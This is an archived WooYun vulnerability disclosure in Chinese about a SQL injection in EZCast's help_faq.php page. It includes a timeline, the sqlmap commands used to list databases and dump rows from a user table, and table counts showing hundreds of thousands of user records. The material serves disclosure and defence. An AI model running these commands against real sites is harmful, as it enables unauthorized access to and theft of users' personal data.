乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-14: 细节已通知厂商并且等待厂商处理中 2016-03-18: 厂商已经确认,细节仅向厂商公开 2016-03-28: 细节向核心白帽子及相关领域专家公开 2016-04-07: 细节向普通白帽子公开 2016-04-17: 细节向实习白帽子公开 2016-05-02: 细节向公众公开
世界最佳的投影APP,跨多个平台 ,超过300W用户群
官网介绍:世界最佳的投影APP,跨多个平台 ,超过300W用户群
python sqlmap.py -u "**.**.**.**/help_faq.php?faq=107&l=cn&type=ezcast" --dbs --count
available databases [18]:[*] backstage[*] ezcast[*] ezcastall[*] ezcastall-20141121-1410[*] ezcastbbs[*] frank_phpbb3[*] information_schema[*] innodb[*] miradisplay[*] mirascreen[*] mysql[*] performance_schema[*] phpbb3[*] phpbb_auth_iezvu[*] phpbben[*] phpmyadmin[*] testiezvucom[*] tmp
Database: ezcast 38W 用户+---------------------+---------+| Table | Entries |+---------------------+---------+| maxhom_download_log | 511830 || maxhom_role_user | 381503 || maxhom_user | 381485 |
Database: ezcastall 21W用户信息+---------------------+---------+| Table | Entries |+---------------------+---------+| maxhom_download_log | 283471 || maxhom_role_user | 210560 || maxhom_user | 210542 |
Database: ezcastbbs+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_home_notification | 58277 || pre_ucenter_members | 57508 || pre_ucenter_memberfields | 57507 || pre_common_member_count | 57500 || pre_common_member_profile | 57500 || pre_common_member_status | 57500 || pre_common_member | 57499
Database: miradisplay+---------------------+---------+| Table | Entries |+---------------------+---------+| maxhom_download_log | 511772 || maxhom_role_user | 82200 || maxhom_attachment | 5077 || maxhom_area | 3266 |
Database: mirascreen+---------------------+---------+| Table | Entries |+---------------------+---------+| maxhom_download_log | 511772 || maxhom_role_user | 379964 || maxhom_user | 379946 || maxhom_attachment | 5077 |
读取10条数据证明
python sqlmap.py -u "**.**.**.**/help_faq.php?faq=107&l=cn&type=ezcast" -D mirascreen -T maxhom_user --dump --start 100 --stop 110
危害等级:中
漏洞Rank:10
确认时间:2016-03-18 16:24
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无